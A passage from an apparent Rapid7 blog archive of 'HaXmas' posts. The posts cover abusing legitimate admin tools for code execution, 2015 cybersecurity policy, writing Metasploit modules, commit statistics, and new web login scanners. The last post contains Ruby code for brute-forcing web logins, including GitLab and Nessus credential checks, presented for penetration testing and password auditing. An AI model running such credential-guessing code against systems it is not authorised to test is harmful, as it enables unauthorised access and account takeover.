Well, lots of places, that's why it's my favorite.

 

Login services

 

The most obvious services are those that give direct console access: SSH, telnet, and Remote Desktop. As an aside, there are two main RDP clients on Linux, rdesktop(1) and xfreerdp(1). The latter is capable of connecting to newer servers that require Network Level Authentication, as opposed to typing creds into the normal Windows logon screen.

 

For bonus points, sometimes VNC is configured with no password, turning it into unauthenticated code execution by design.

 

PowerShell remoting (along with WinRM, the underlying protocol it uses) fits here, too; with the Invoke-Command cmdlet, you can run arbitrary PowerShell commands on a target server with the current user's (or a supplied user's) rights. Here's an example of what that looks like, directly from MSDN:

PS C:\> Invoke-Command -ComputerName S1, S2 -ScriptBlock {Get-Process PowerShell}
  PSComputerName    Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id   ProcessName
  --------------    -------  ------    -----      ----- -----   ------     --   -----------
  S1                575      15        45100      40988   200     4.68     1392 PowerShell
  S2                777      14        35100      30988   150     3.68     67   PowerShell

Also in this category, but perhaps less obvious, are things like VSphere (which usually runs on TCP port 902) that allow you to manage virtual machines via some sort of console access. All of the major virtualization technologies and VPS providers have something like this.

 

Then you have things like Windows SMB. The protocol isn't exactly direct console access, but it gives local administrators access to the Service Control Manager and thereby enables psexec. From there, you can run powershell commands, avoiding all the unpleasantness associated with dropping files.

 

Server administration

 

In the Java web app world, there are tons of middleware doohickeys intended to ease deployment. They vary in complexity and scale, but most of them offer some sort of administration console as a webapp. The one you're most likely familiar with is Tomcat, since it's installed on Metasploitable2. Tomcat's /manager application is intended for administrators to manage installed applications, including the ability to deploy new applications by uploading a WAR archive. Once deployed, WAR archives are essentially executables that can do anything the tomcat user can do -- much more than the manager application can do directly.

 

tomcat-manager.png

This is Tomcat 5.5 from Metasploitable, but newer versions offer all the same functionality.

 

IBM WebSphere has basically the same functionality, with the added fun that it often manages multiple servers in a cluster.

 

Then there are the tools that aren't direct login services, but which are intended for doing all the tasks an administrator would want from such services in a web interface; Plesk and CPanel are popular examples. They provide filesystem access including uploads, often direct command execution, and usually an extension/plugin system that allows code execution in whatever language they're written in. In addition, you can use them to enable direct console access, e.g. through CPanel's SSH key manager:

cpanel-manage-ssh.png

 

I place phpMyAdmin / phpPgAdmin in this group as well, even though they're usually not code execution in the sense of running an executable or a command. The potential they offer is incontrovertible, though.

 

phpmyadmin.png

 

Content Management Systems

 

A CMS is ostensibly just for content, i.e. blog posts or other such user-facing things an organization wants to make available, either internally or publicly. WordPress and Joomla are two of the most popular CMSs out there. Both have been riddled with vulnerabilities, in no small part due to their flexible plugin systems and an ecosystem that lets anyone publish code, which end-users can easily install, in a language that is notoriously difficult to write securely. But what may not be immediately apparent is that those plugin systems themselves are also authenticated code execution by design. Themes and plugins in both WordPress and Joomla are just PHP code. An authenticated admin can load themes and plugins from anywhere.

 

How do I defend against this?

 

  • Don't expose administration interfaces to the internet if you can help it.

  • Audit successful logins. You should know if Bob from accounting logs into an engineering server at midnight on a Saturday. Likewise, you should know if anyone logs into a hundred boxes in ten minutes. And that activity should throw some red flags.

  • Segment your networks. Bob from accounting probably shouldn't be able to reach those engineering servers at all.

  • Change defaults.

  • Don't reuse passwords. Microsoft's Local Admin Password Solution (LAPS) seems like a pretty good idea.

  • Use Windows' password filter capabilities to prevent users from choosing some of the most common things like "Summer2015" and your company name as passwords.

 

None of the above should come as a surprise.

What about Antivirus, Intrusion Prevention Systems, Application Whitelisting?

 

With some technologies like SSH and Remote Desktop, AV evasion is not even a minor concern because you're using something that's already there, signed by the vendor, and approved by IT.

What about patching?

 

There's nothing to patch. It's not a vulnerability. There are no CVEs for "Remote Desktop is enabled" or "Your server works the way it is supposed to." These types of tools are everywhere and will live forever.

Conclusions

 

Using a remote administration tool that was installed by a legitimate administrator has a lot of advantages.

 

First, it isn't suspicious. AV will not freak out about using something that was installed by IT and whitelisted by an administrator. IPS doesn't care when a legit account logs into a legit app and uses it like it's supposed to be used.

 

Second, the best persistence mechanism of all is a password. Leaving executables in obvious locations is a good way to get caught by those meddling incident response folks but a successful login is at best ambiguous.

 

Third, it turns out that software intended for remote administration is pretty good at remote administration. Things like phpMyAdmin give you tons of power that is hard to match with a necessarily simpler payload. They're also preconfigured by kind administrators in anticipation of your arrival. Because they're set up specifically for the environment in which they run, their settings and their data can get you closer to your goal faster. For example, phpMyAdmin can have saved queries, which can save you tons of time in finding what you want to steal.

 

So happy New Year! Go log into something.

This post is the ninth in the series, "The 12 Days of HaXmas."

 

2015 was a big year for cybersecurity policy and legislation; thanks to the Sony breach at the end of 2014, we kicked the new year off with a renewed focus on cybersecurity in the US Government. The White House issued three legislative proposals, held a cybersecurity summit, and signed a new Executive Order, all before the end of February. The OPM breach and a series of other high profile cybersecurity stories continued to drive a huge amount of debate on cybersecurity across the Government sphere throughout the year. Pretty much every office and agency is building a position on this topic, and Congress introduced more than 100 bills referencing “cybersecurity” during the year.

 

So where has the security community netted out at the end of the year in terms of policy and legislation? Let’s recap some of the biggest cybersecurity policy developments…

 

Cybersecurity Information Sharing

 

This was Congress’ top priority for cybersecurity legislation in 2015 and the TL;DR is that an info sharing bill was passed right before the end of the year. The idea of an agreed legal framework for cybersecurity information sharing has merit; however, the bill has drawn a great deal of fire over privacy concerns, particularly with regard to how intelligence and law enforcement agencies will use and share information.

 

The final bill was the result of more than five years of debate over various legislative proposals for information sharing, including three separate bills that went through votes in 2015 (two in the House and one in the Senate).  In the end, the final bill was agreed through a conference process between the House and Senate, and included in the Omnibus Appropriations Act.

 

Despite this being the big priority for cybersecurity legislation, a common view in the security community seems to be that this is unlikely to have much impact in the near term. This is partly because organizations with the resources and ability to share cybersecurity information, such as large financial or retail organizations, are already doing so.  The liability limitation granted in the bill means they are able to continue to do this with more confidence. It’s unlikely to draw new organizations into the practice as participation has traditionally centered more on whether the business has the requisite in-house expertise, and a risk profile that makes security a headline priority for the business, rather than questions of liability. For many organizations that strongly advocated for legislation, a key goal was to get the government to improve its processes for sharing information with the private sector. It remains to be seen whether the legislation will actually help with this.

 

Right to Research

 

For those that have read any of my other posts on legislation, you probably know that protecting and promoting research is the primary purpose of Rapid7’s (and my) engagement in the legislative arena. This year was an interesting year in terms of the discussion around the right to research…

 

The DMCA Rulemaking

 

The Digital Millennium Copyright Act (DMCA) prohibits the circumvention of technical measures that control access to copyrighted works, and thus it has traditionally been at odds with security research.  Every three years, there is a “rulemaking” process for the DMCA whereby exemptions to the prohibition can be requested and debated through a multi-phase public process. All granted exemptions reset at this point, so even if your exemption has been passed before, it needs to be re-requested every three years.  The idea of this is to help the law keep up with the changing technological landscape, which is sensible, but the reality is a pretty painful, protracted process that doesn’t really achieve the goal.

 

In 2015, several requests for security research exemptions were submitted: two general ones, one for medical devices, and one for vehicles. The Library of Congress, which oversees the rulemaking process, rolled these exemption requests together, and at the end of October it announced approval of an exemption for good faith security research on consumer-centric devices, vehicles, and implantable medical devices. Hooray!

 

Don’t get too excited though – the language in the announcement sounded somewhat as though the Library of Congress was approving the exemption against its own better judgment, and with some heavy caveats, most notably that it won’t come into effect for a year (except for voting machines, which you can start researching now). More on that here.

 

Despite that, this is a positive step in terms of acceptance for security research, and demonstrates increased support and understanding of its value in the government sector.

 

CFAA Reform

 

The Computer Fraud and Abuse Act (CFAA) is the main anti-hacking law in the US and all kinds of problematic.  The basic issues as relates to security research can be summarized as follows:

  • It’s out of date – it was first passed in 1986, and despite some “updates” since then, it feels woefully out of date. One of the clearest examples of this is that the law talks about access to “protected computers,” which back in ’86 probably meant a giant machine with an actual fence and guard watching over it. Today it means pretty much any device you use that is more technically advanced than a slide rule.
  • It’s ambiguous – the law hinges on the notion of “authorization” (you’re either accessing something without authorization, or exceeding authorized access), yet this term is not defined anywhere, and hence there is no clear line of what is or is not permissible. Call me old fashioned, but I think people should be able to understand what is covered by a law that applies to them…
  • It contains both civil and criminal causes of action. Sadly, most researchers I know have received legal threats at some point. The vast majority have come from technology providers rather than law enforcement; the civil causes of action in the CFAA provide a handy stick for technology providers to wield against researchers when they are concerned about negative consequences of a disclosure.

 

The CFAA is hugely controversial, with many voices (and dollars spent) on all sides of the debate, and as such efforts to update it to address these issues have not yet been successful.

 

In 2015 though, we saw the Administration looking to extend the law enforcement authorities and penalties of the CFAA as a means of tackling cybercrime. This focus found resonance on the Hill, resulting in the development of the International Cybercrime Prevention Act, which was then abridged and turned into an amendment that its sponsors hoped to attach to the cybersecurity information sharing legislation. Ultimately, the amendment was not included with the bill that went to the vote, which was the right outcome in my opinion.

 

The interesting and positive thing about the process though was the diligence of staff in seeking out and listening to feedback from the security research community. The language was revised several times to address security research concerns. To those who feel that the government doesn’t care about security research and doesn’t listen, I want to highlight that the care and consideration shown by the White House, Department of Justice, and various Congressional offices through discussions around CFAA reform this year suggests that is not universally the case. Some people definitely get it, and they are prepared to invest the time to listen to our concerns and get the approach right.

 

It’s Not All Positive News

 

Despite my comments above, it certainly isn’t all plain sailing, and there are those in the Government who fear that researchers may do more harm than good. We saw this particularly clearly with a vehicle safety bill proposal in the second half of the year, which would make security research on cars illegal. Unfortunately, the momentum for this was fed by fears over the way certain high-profile car research was handled this year.

 

The good news is that there were plenty of voices on the other side pointing out the value of research as the bill was debated in two Congressional hearings. As yet, this bill has not been formally introduced, and it’s unlikely to be without a serious rewrite. Still, it behooves the security research community to consider how its actions may be viewed by those on the outside – are we really showing our good intentions in the best light? I have increasingly heard questions arise in the government about regulating research or licensing researchers. If we want to be able to address that kind of thinking in a constructive way to reach the best outcome, we have to demonstrate an ability to engage productively and responsibly.

 

Vulnerability Disclosure

 

Following high profile vulnerability disclosures in 2014 (namely, Heartbleed and Shellshock), and much talk around bug bounties, challenges with multi-party coordinated disclosures, and best practices for so called “safety industries” – where problems with technology can adversely impact human health and safety, so e.g. medical devices, transportation, power grids etc. – the topic of vulnerability disclosure was once again on the agenda. This time, it was the Obama Administration taking an interest, led by the National Telecommunications and Information Administration (NTIA, part of the Department of Commerce). They convened a public multi-stakeholder process to tackle the thorny and already much-debated topic of vulnerability disclosure.  The project is still in relatively early stages, and could probably do with a few more researcher voices, so get involved! One of the inspiring things for me is the number of vendors that are new to thinking about these things and are participating.  Hopefully we will see them adopting best practices and leading the way for others in their industries.

 

At this stage, participants have split into four groups to tackle multiple challenges: awareness and adoption of best practices; multi-party coordinated disclosure; best practices for safety industries; and economic incentives.  I co-lead the awareness and adoption group with the amazing Amanda Craig from Microsoft, and we’re hopeful that the group will come up with some practical measures to tackle this challenge.  If you’re interested in more information on this issue specifically, you can email us.

 

Export Controls

 

Thanks to the Wassenaar Arrangement, in 2015, export controls became a hot topic in the security industry, probably for the first time since the Encryption Wars (Part I).

 

The Wassenaar Arrangement is an export control agreement amongst 41 nation states with a particular focus on national security issues – hence it pertains to military and dual-use technologies. In 2013, the members decided that this should include both intrusion and surveillance technologies (as two separate categories). From what I’ve seen, the surveillance category seems largely uncontested; however, the intrusion category has caused a great deal of concern across the security and other business communities.

 

This is a multi-layered concern – the core language that all 41 states agreed to raises concerns, and the US proposed rule for implementing the control raises additional concerns. The good news is that the Bureau of Industry and Security (BIS) – the folks at the Department of Commerce that implement the control – and various other parts of the Administration, have been highly engaged with the security and business communities on the challenges, and have committed to redrafting the proposed rule, implementing a number of exemptions to make it livable in the US, and opening a second public comment period in the new year.  All of which is actually kind of unheard of, and is a strong indication of their desire to get this right.  Thank you to them!

 

Unfortunately, the bad news is that this doesn’t tackle the underlying issues in the core language. The problem here is that the definition of what’s covered is overly broad and limits sharing information on exploitation. This has serious implications for security researchers, who often build on each other’s work, collaborate to reach better outcomes, and help each other learn and grow (which is also critical given the skills shortage we face in the security industry). If researchers around the world are not able to share cybersecurity information freely, we all become poorer and more vulnerable to attack.

 

There is additional bad news: more than 30 of the member states have already implemented the rule and seem to have fewer concerns over it, and this means the State Department, which represents the US at the Wassenaar discussions, is not enthusiastic about revisiting the topic and requesting that the language be edited or overturned. The Wassenaar Arrangement is based on all members arriving at consensus, so all must vote and agree when a new category is added, meaning the US agreed to the language and agreed to implement the rule. From State’s point of view, we missed our window to raise objections of this nature and it’s now our responsibility to find a way to live with the rule. Dissenters ask why the security industry wasn’t consulted BEFORE the category was added.

 

The bottom line is that while the US Government can come up with enough exemptions in their implementation to make the rule toothless and not worth the paper it’s written on, it will still leave US companies exposed to greater risk if the core language is not addressed.

 

As I mentioned, we’ve seen excellent engagement from the Administration on this issue and I’m hopeful we’ll find a solution through collaboration. Recently, we’ve also seen Congress start to pay close attention to this issue, which is also likely to help move the discussion forward:

  • In December, 125 members of the House of Representatives signed a letter addressed to the White House asking them to step into the discussion around the intrusion category. That’s a lot of signatories and will hopefully encourage the White House to get involved in an official capacity. It also indicates that Wassenaar is potentially going to be a hot topic for Congress in 2016.
  • Reflecting that, the House Committee on Homeland Security, and the House Committee on Oversight and Government Reform are joining forces for a joint hearing on this topic in January.

 

The challenges with the intrusion technology category of the Wassenaar Arrangement highlight a hugely complex problem: how do we reap the benefits of a global economy, while clinging to regionalized nation state approaches to governing that economy?  How do you apply nation state laws to a borderless domain like the internet? There are no easy answers to these questions, and we’ll see the challenges continue to arise in many areas of legislation and policy this year.

 

Breach Notification

 

In the US, there was talk of a federal law to set one standard for breach notification.  The US currently has 47 distinct state laws setting requirements for breach notification.  For any businesses operating in multiple states, this creates confusion and administrative overhead.  The goal for those that want a federal breach notification law is to simplify this by having one standard that applies across the entire country. In principle this sounds very sensible and reasonable.  The problem is that the federal legislative process does not move quickly, and there is concern that by making this a federal law, it will not be able to keep up with changes in the security or information landscape, and thus consumers will end up worse off than they are today. To address this concern, consumer protection advocates urge that the federal law not pre-empt state law that sets a higher standard for notification. However, this does not alleviate the core problem any breach notification bill is trying to get at – it just adds yet another layer of confusion for businesses. So I suspect it’s unlikely we’ll see a federal breach notification bill pass any time soon, but I wouldn’t be surprised if we see this topic come up again in cybersecurity legislative proposals this year.

 

Across the pond, there was an interesting development on this topic at the end of the year – the European Union issued the Network and Information Security Directive, which, amongst other things, requires that operators of critical national infrastructure report breaches (interestingly, this is kind of at odds with the US approach, where there is a law protecting critical infrastructure from public disclosure). The EU directive is not a law – member states will now have to develop their own in-country laws to put this into practice. This will take some time, so we won’t see a change straight away. My hope is that many of the member states will not limit their breach notification requirements to only organizations operating critical infrastructure – consumers should be informed if they are put at risk, regardless of the industry. Over time, this could mark a significant shift in the dialogue and awareness of security issues in Europe; today there seems to be a feeling that European companies are not being targeted as much as US ones, which seems hard to believe. It seems likely to me that part of the reason we don’t hear about it so much is that the breach notification requirement is not there, and many victims of attacks keep it confidential.

 

Cyber Hygiene

 

This was a term I heard a great deal in government circles this year as policy makers tried to come up with ways of encouraging organizations to put basic security best practices in place. The kinds of things on the list here would be patching, using encryption, and so on. It’s almost impossible to legislate for this in any meaningful way, partly because the requirements would likely already be out of date by the time a bill passed, and partly because you can’t take a one-size-fits-all approach to security. It’s more productive for Governments to take a collaborative, educational approach and provide a baseline framework that can be adapted to an organization’s needs. This is the approach the US takes with the NIST Framework (which is due for an update in 2016), and similarly CESG in the UK provides excellent non-mandated guidance.

 

There was some discussion around incentivizing adoption of security practices – we see this applied with liability limitation in the information sharing law.  Similarly, there was an attempt at using this carrot to incentivize adoption of security technologies.  The Department of Homeland Security (DHS) awarded FireEye certification under the SAFETY Act. This law is designed to encourage the use of anti-terrorism technologies by limiting liability for a terrorist attack. So let’s say you run a football stadium and you deploy body scanners for everyone coming on to the grounds, but someone still manages to smuggle in and set off an incendiary device; you could be protected from liability because you were using the scanners and taking reasonable measures to stop an attack. In order for organizations to receive the liability limitation, the technology they deploy must be certified by DHS.

 

Now when you’re talking about terrorist attacks, you’re talking about some very extreme circumstances, with very extreme outcomes, and something that statistically is rare (tragically not as rare as it should be). By contrast, cybercrime is extremely common, and can range vastly in its impact, so this is basically like comparing apples to flamethrowers. On top of that, using a specific cybersecurity technology may be less effective than an approach that layers a number of security practices together, e.g. setting appropriate internal policies, educating employees, patching, air gapping etc. Yet, if an organization has liability limitation because it is deploying a security technology, it may feel these other measures are unnecessarily costly and resource hungry. So there is a pretty reasonable concern that applying the SAFETY Act to cybersecurity may be counter-productive and actually encourage organizations to take security less seriously than they might without liability limitation.

 

Nonetheless, there was a suggestion that the SAFETY Act be amended to cover cybersecurity. Following a Congressional hearing on this, the topic has not reared its head again, but it may reappear in 2016.

 

Encryption

 

Unless you’ve been living under a rock for the past several months (which might not be a terrible choice all things considered), you’ll already be aware of the intense debate raging around mandating backdoors for encryption. I won’t rehash it here, but have included it because it’s likely to be The Big Topic for 2016. I doubt we’ll see any real resolution, but expect to see much debate on this, both in the US and internationally.

 

~@infosecjen

New-year-greetings-2016-4.jpg

This post is the eighth in the series, "12 Days of HaXmas."

 

It’s that time of year again; when we all look to making resolutions to make changes in our lives. For some, it is eating healthy or exercising. Others decide to spend their time differently or change spending habits. Often these resolutions work for a few weeks, but then we quickly fall back into the old habits and break those resolutions. Me, I am resolving to write more Metasploit modules. You see, back in October, Rapid7 publicly (and responsibly) disclosed a bug I found in the HP SiteScope software. As part of that release, I wrote my first Metasploit module. While I would not call myself a programmer, or even proficient in Ruby, it was such a rewarding experience that I want to do it again.

to-do-resolution-new-year.jpg

The process started in June when I discovered the flaw. (You can read more about the disclosure here.) I went ahead and started through the disclosure process (see here for Rapid7’s disclosure policy), and as part of the procedure, I decided to create a Metasploit module for the exploit. By nature, or by previous experience, I am a scripter. I love to write little one-off scripts that make my day-to-day life easier. When I was a Systems Administrator, my scripts would be written in PowerShell, batch jobs, or Bash. Once I started getting into security, I started using a more “grown up” language and learned Python. While I had a little experience with Ruby (Serpico), I had never attempted to learn Ruby or create any tools with it, so the thought of writing not only a Ruby script, but a Metasploit module, was a bit daunting. Luckily there are some great resources on Rapid7’s sites, as well as awesome members of the Metasploit team who were willing to help me out. One is the How to get started writing an exploit article on GitHub. Another is a Community series about writing exploits.

 

Before bothering with trying to write in Ruby, I created the exploit in a language I am familiar with. This would allow me to get the exploit written quickly, as well as easily port it to Ruby/Metasploit when finished. (I also figured that if I wanted someone to help me, they would want a working script, or that it would at least be helpful.) This process was invaluable to me. I was able to work through the process and get into the nitty-gritty of exploit development. It took a little while, but soon I had a working Python exploit. The next step was getting a working Metasploit module.

 

If you have never created a Metasploit module, or have not looked at the code of different modules, I would suggest you look at a few existing modules before attempting to write your own. That's what I did. I looked for exploits similar to the one I was creating, and studied how they were written and what they did. I was able to copy much of the existing modules and adapt the code to my own exploit. At first the module was clunky and ugly. I enlisted the help of one of the Metasploit team’s members, Juan Vazquez, who took a look at the exploit code and the module, and tested a bit against the system I stood up for him. Quicker than I can explain, he got back to me with the information I needed to develop the module better, and he even modified the code and added some other features.

 

The day finally came, my exploit module was completed, the advisory went out, and the module was merged into Metasploit. What a relief it was for me to have that done and working.

 

Since then I have started looking into more modules and exploits. This year, my resolution is to continue to add to Metasploit and the information security community by creating modules for Metasploit. While getting started may seem like a daunting task, once you do you will find how rewarding an experience it is. I urge you to make a similar resolution.

to-do-resolution-new-year2.jpg

This is the seventh post in the series, "The 12 Days of HaXmas."

 

It's the last day of the year, which means that it's time to take a moment to reflect on the ongoing development of the Metasploit Framework, that de facto standard in penetration testing, and my favorite open source project around.

 

While the acquisition of Metasploit way back in 2009 was met with some healthy skepticism, I think this year it's easy to say that Rapid7's involvement with Metasploit has been an enormously positive experience for the project, regardless of whether you happen to work on or use Rapid7 products. 2015 marks another year of our (and your!) commitment to both the principles of open source and the day-to-day care and feeding of this beast.

 

New Modules!

msf-banner-2015.png

Checking out today's development branch banner and comparing to last year, it looks like Metasploit Framework saw the addition of 136 new exploits, 98 new auxiliary modules, 34 new post modules, and 81 new payloads, for a grand total of 349 new modules for the calendar year -- just a shade under one a day. Compared to last year, the new payload count is particularly impressive; that count represents the work being done around refreshing and updating Meterpreter and expanding what it means to get shells.

 

Commits and Authors

2015 saw 7099 commits, 5519 of which were non-merge commits. Once again, this is an incredible effort from a contributor pool of 176 distinct committers, the vast majority of whom weren't employed by Rapid7. Most open source projects are really only worked on by a handful of people; the thing that makes Metasploit one of the top ten Ruby projects hosted on GitHub (not to mention the second-most starred security project) is the support, effort, and criticism of our developer community. And speaking of our developer community, the top 25 most prolific committers (by non-merge count) for 2015 are:

 

Name/Alias         Commit Count
jvazquez-r7        1112
wchen-r7           757
jhart-r7           336
hdm                256
wvu-r7             252
bcook-r7           235
oj                 231
Meatballs1         199
todb-r7            145
jlee-r7            126
espreto            120
FireFart           96
dmaloney-r7        87
benpturner         84
JT                 80
stufus             68
zeroSteiner        66
KronicDeth         64
void-in            59
joevennix          58
Matthew Hall       54
brandonprry        45
rastating          43
techpeace          36
Pedro Ribeiro      35
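
For the curious, numbers like these are straightforward to reproduce from a local checkout. Here's a rough sketch that simply shells out to git, assuming git is installed and the script is run from inside the repository:

# Roughly reproduce the yearly commit and committer counts for the
# metasploit-framework repository. Run from inside a checkout.
range   = '--since=2015-01-01 --until=2016-01-01'
commits = `git rev-list --count --no-merges #{range} HEAD`.strip
authors = `git shortlog -sn --no-merges #{range} HEAD`.lines
puts "#{commits} non-merge commits from #{authors.length} committers"
puts authors.first(25).join    # top 25 by non-merge commit count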

 

We have some new names on that list, which is great! I'm super excited to see what these newly prolific security devs will be up to in 2016. And, as was the case last year, just about half (12 of 25) of these committers weren't financially connected to Metasploit products as employees or contractors; they're among the hard-working volunteers responsible for pushing security research forward.

 

Finally, here's the alphabetized list of everyone who committed at least one chunk of content to the Metasploit Framework in 2015:

 

0xFFFFFF, aakerblom, aczire, Adam Ziaja, agix, Alex Watt, Alexander Salmin, Anant Shrivastava, Andrew Smith, andygoblins, aos, aushack, Balazs Bucsay, Bazin Danil, BAZIN-HSC, bcoles, bcook-r7, Ben Lincoln, Ben Turner, benpturner, bigendian smalls, Bigendian Smalls, Borja Merino, Boumediene Kaddour, brandonprry, brent morris, bturner-r7, C-P, cdoughty-r7, Christian Sanders, claudijd, cldrn, crcatala, Daniel Jensen, Darius Freamon, Dave Hardy, David Barksdale, David Lanner, Denis Kolegov, dheiland-r7, Dillon Korman, dmaloney-r7, dmohanty-r7, dmooray, dnkolegov, Donny Maasland, Donny Maasland (Fox-IT), Elia Schito, EricGershman, erwanlr, espreto, Ewerson Guimaraes (Crash), eyalgr, Fabien, farias-r7, Fatih Ozavci, Felix Wehnert, Ferenc Spala, FireFart, fraf0, g0tmi1k, Gabor Seljan, gmikeska-r7, Guillaume Delacour, h00die, Hans-Martin Münch (h0ng10), hdm, headlesszeke, IMcPwn, jabra, Jack64, jaguasch, Jake Yamaki, Jakob Lell, jakxx, Jay Smith, jduck, jhart-r7, jlee-r7, joevennix, John Lightsey, John Sherwood, Jon Cave, jstnkndy, JT, juanvazquez, Julian Vilas, julianvilas, jvicente, jvoisin, jww519, kaospunk, karllll, kernelsmith, kn0, KronicDeth, lanjelot, Lluis Mora, lsanchez-r7, lsato-r7, Lutzy, m-1-k-3, m0t, m7x, Manuel Mancera, Marc-Andre Meloche, Mark Judice, Matthew Hall, Matthias Ganz, Meatballs1, Mike, Mo Sadek, mubix, Muhamad Fadzil Ramli, Nanomebia, Nate Power, Nicholas Starke, Nikita Oleksov, nixawk, nstarke, nullbind, oj, pdeardorff-r7, Pedro Ribeiro, peregrino, Peregrino Gris, PsychoMario, pyllyukko, radekk, RageLtMan, Ramon de C Valle, rastating, rcnunez, Ricardo Almeida, root, Rory McNamara, rwhitcroft, Sam H, Sam Handelman, Sam Roth, sammbertram, samvartaka, scriptjunkie, Sean Verity, sekritskwurl, sgabe, sgonzalez-r7, shuckins-r7, Sigurd Jervelund Hansen, somename11111, stufus, Sven Vetsch, Tab Assassin, techpeace, Th3R3p0, Thomas Ring, timwr, todb-r7, Tom Spencer, TomSellers, trevrosen, void-in, vulp1n3, wchen-r7, wez3, wvu-r7, xistence, Zach Grace, zeroSteiner

 

We really couldn't have made Metasploit without everyone listed there, so thanks again for sharing our commitment to open source security research and development. May your buffers always be overflowing.

 

Ponies!

Of course, the most beloved change to Metasploit in 2015 wasn't the Great Regemification, the souped up Android payloads (or any of the other amazing work on the Metasploit and Meterpreter payload systems in general), the integrated Omnibus installers, or any of those boring technical advancements that push the boundaries of penetration testing. It was the April Fool's Pony Banner Update, made possible by the ponysay project run by Erkin Batu Altunbaş. So, here you go:

 

[Pony banner images: "exploits are magic," "free shells forever," "shells are cool," "20 percent cooler," and "i love shells"]

 

Happy New Year, everyone!

This is the sixth post in the series, "The Twelve Days of HaXmas."

 

Well, the year is coming to a close, and it's just about time for the annual breakdown of Metasploit commit action. But before we get to that, I wanted to take a moment to highlight the excellent work we landed in 2015 in adding new web application login support to Metasploit. After all, who needs exploits when your password is "public" or "admin" or "password" or any other of the very few well-known default passwords? Maybe it's not the sexiest way to get a foothold on a network, but we are increasingly living in a network environment that hosts loads and loads of unconfigured, insecure Internet of Things devices.

 

So, let's take a stroll through the new web application login support added over the first half of 2015. Maybe you missed them the first time around, so this sixth day of HaXmas is a fine time to catch up.

 

Chef and Zabbix

https://github.com/rapid7/metasploit-framework/pull/4787

 

In February of 2015, HD Moore picked up a request for a couple of brute force modules designed to guess the passwords to the web front ends for Chef, the popular DevOps deployment tool, and Zabbix, an enterprise monitoring system. Most web application authentication systems are uniquely implemented; rarely do web applications use HTTP basic authentication any more.

 

Sussing out the basic API for entering a username and password can take a little time and effort. There are automated ways to determine the right format (namely, Rapid7's AppSpider), but if you have the wherewithal to do a little investigative work, the pull request for the Chef and Zabbix modules is a great example of how to toss off a quick web application brute force module; the initial work from HD and the landing work from David TheLightCosine Maloney are both pretty illuminating.
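
Stripped of the application-specific details, the heart of one of these modules is just a single authenticated request and a check of the response. Here's a rough, hypothetical sketch of that pattern; the /login path, the form field names, and the redirect-plus-cookie success check are placeholders that will differ for any real application:

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Example Web Application Login Scanner',
      'Description' => 'Tries username/password pairs against a hypothetical web front end.',
      'Author'      => [ 'your name here' ],
      'License'     => MSF_LICENSE
    )
  end

  def run_host(ip)
    each_user_pass do |user, pass|
      res = send_request_cgi(
        'method'    => 'POST',
        'uri'       => normalize_uri('/login'),                    # placeholder path
        'vars_post' => { 'username' => user, 'password' => pass }  # placeholder fields
      )
      # Placeholder success check: many web apps redirect and set a
      # session cookie on a good login
      if res && res.code == 302 && res.get_cookies =~ /session/i
        print_good("#{ip} - valid credentials: #{user}:#{pass}")
        # A real module would also record the credential with the
        # framework's credential reporting helpers here
      end
    end
  end
end

The AuthBrute mixin is what wires up the usual USERNAME/PASSWORD/USER_FILE/PASS_FILE options and the each_user_pass iterator, so the module only has to describe the request itself.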

 

GitLab

https://github.com/rapid7/metasploit-framework/pull/4942

 

In March of 2015, contributor Ben Meatballs Campbell of MWR Labs published an advisory about a user enumeration information leak in GitLab. GitLab is a popular open source alternative to GitHub Enterprise, used to host GitHub-like repositories internally for software development.

 

While he was in that neighborhood, he put together a quick login scanner for GitLab as well, presumably to start guessing passwords for the users just identified via this leak. Again, we can see from the pull request that this kind of web application protocol implementation has gotten pretty straightforward.
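
For a Rails application like GitLab there's one extra wrinkle: the sign-in form carries a CSRF token that has to be fetched first and echoed back. Roughly, the attempt inside a module like the sketch above (same HttpClient mixin, with user and pass coming from each_user_pass) looks like the following; the /users/sign_in path and the user[login]/user[password] field names follow GitLab's conventions and may vary between versions:

# Step 1: fetch the sign-in page to pick up the CSRF token and cookies
res = send_request_cgi('uri' => normalize_uri('/users/sign_in'))
return unless res && res.code == 200

token   = res.body[/name="authenticity_token"\s+value="([^"]+)"/, 1]
cookies = res.get_cookies

# Step 2: post the credentials back along with the token
login = send_request_cgi(
  'method'    => 'POST',
  'uri'       => normalize_uri('/users/sign_in'),
  'cookie'    => cookies,
  'vars_post' => {
    'authenticity_token' => token,
    'user[login]'        => user,
    'user[password]'     => pass
  }
)

# A redirect away from the sign-in page is a reasonable success signal
print_good("Valid GitLab credentials: #{user}:#{pass}") if login && login.code == 302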

 

Nessus REST

https://github.com/rapid7/metasploit-framework/pull/5112

 

In April of 2015, contributor Waqas voidin Ali offered up a login scanner for Nessus, the popular vulnerability scanner. Suffice it to say that if an attacker gets hold of your vulnerability scanner's authentication credentials, you have some pretty serious problems.

 

Vuln scanners are one of those network services that make for an ideal attack platform: they touch a lot of machines through unsolicited connections, which can mask any lateral movement an attacker is likely to attempt; they hold loads of information about the internal network, making an otherwise noisy scanning operation a moot point; and they tend to be ignored by internal security controls already, given how noisy they normally are on the wire.

 

Routinely checking your vulnerability scanner for weak, guessable, and known passwords is pretty basic internal security hygiene, since the consequences of compromise are so dire. This module makes this task pretty easy.
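
For the curious, under the hood this check boils down to a single REST call: POST the credentials to /session and see whether a token comes back. Here's a rough standalone sketch, assuming a Nessus 6-style REST API on the default port 8834; the hostname and credentials below are made up:

# Check a single credential pair against a Nessus REST API endpoint.
require 'net/http'
require 'json'
require 'openssl'

def nessus_cred_valid?(host, user, pass, port: 8834)
  http = Net::HTTP.new(host, port)
  http.use_ssl     = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE  # Nessus ships a self-signed cert
  res = http.post('/session',
                  { username: user, password: pass }.to_json,
                  'Content-Type' => 'application/json')
  # A valid login returns 200 and a session token in the JSON body
  res.code == '200' && JSON.parse(res.body).key?('token')
end

puts nessus_cred_valid?('192.168.1.50', 'admin', 'admin')

In practice, though, the module handles all of this for you; point it at the scanner from msfconsole with the usual USER_FILE/PASS_FILE options and let it run.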

 

Symantec Gateway

https://github.com/rapid7/metasploit-framework/pull/4945

 

In March, Wei sinn3r_ Chen put together a login scanner for Symantec Web Gateway, a web proxy used to filter for malware and other sorts of evil from malicious or compromised web sites. While this was an exercise similar to the above web application login modules, the most significant effort in this area happened in May of 2015.

